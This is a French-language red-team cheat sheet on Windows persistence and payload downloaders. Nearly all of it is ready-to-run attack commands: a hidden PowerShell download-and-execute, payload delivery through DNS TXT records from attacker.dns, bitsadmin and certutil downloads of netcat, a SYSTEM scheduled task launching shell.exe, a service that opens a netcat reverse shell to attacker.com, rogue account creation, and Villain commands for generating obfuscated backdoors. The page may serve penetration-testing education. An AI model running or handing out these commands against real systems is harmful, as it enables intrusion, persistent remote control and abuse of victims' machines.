⚓Persistance / Downloaders
Mindmap

Downloader Powershell
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://<ip>:<port>/<file>'))"
Si l'utilisation de IEX est bloqué, il est également possible de stocker son payload dans un enregistrement TXT d'un serveur DNS.
powershell.exe (nslookup -q=txt attacker.dns)[-1]
Lolbins
Les lolbins sont des exécutables natifs dans Windows dont l'usage peut être contournés à des fins malveillantes.
Pour plus d'infos: https://lolbas-project.github.io/
BITSAdmin
Background Intelligent Transfer Service (BITS) est un service Windows permettant le transfert de fichiers en arrière-plan de façon intelligente depuis ou vers un serveur.
bitsadmin /transfer myjob /download /priority high http://attacker.com/nc64.exe c:\temp\nc.exe
Certutil
Certutil est un programme en ligne de commande, installé dans le cadre des services de certificats. Vous pouvez l'utiliser pour vider et afficher les informations de configuration de l’autorité de certification, configurer les services de certificat, sauvegarder et restaurer les composants de l’autorité de certification, et vérifier les certificats, les paires de clés et les chaînes de certificats.
Il est possible de contourner son usage légitime pour télécharger des programmes malveillants de cette manière.
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Tâches planifiées
Exemple de création d'une tâche planifiée qui lance "shell.exe" toutes les minutes:
schtasks /create /sc minute /mo 1 /tn "eviltask" /tr C:\tools\shell.exe /ru "SYSTEM"
Service
Exemple de création d'un service malveillant avec netcat:
> sc create <evilsvc> binpath= "c:\tools\nc attacker.com 443 -e cmd.exe" start= "auto" obj= "LocalSystem" password= ""
> sc start <evilsvc>
Créer un utilisateur
net user <username> <password> /add /domain
Outils
Villain
Villain est un outil permettant de créer des portes dérobées obfusqué "indetectable" par les anti-virus.
Exemple d'utilisation:
$ ./Villain.py
villain > generate os=windows lhost=eth0 obfuscate
villain > sessions
villain > shell <Session ID>
ressource: https://github.com/t3l3machus/Villain
Suborner
Suborner permet de créer des utilisateurs windows discret sans utilisation de "net user" ou de "netapi32::netuseradd".
Dernière mise à jour
Cet article vous a-t-il été utile ?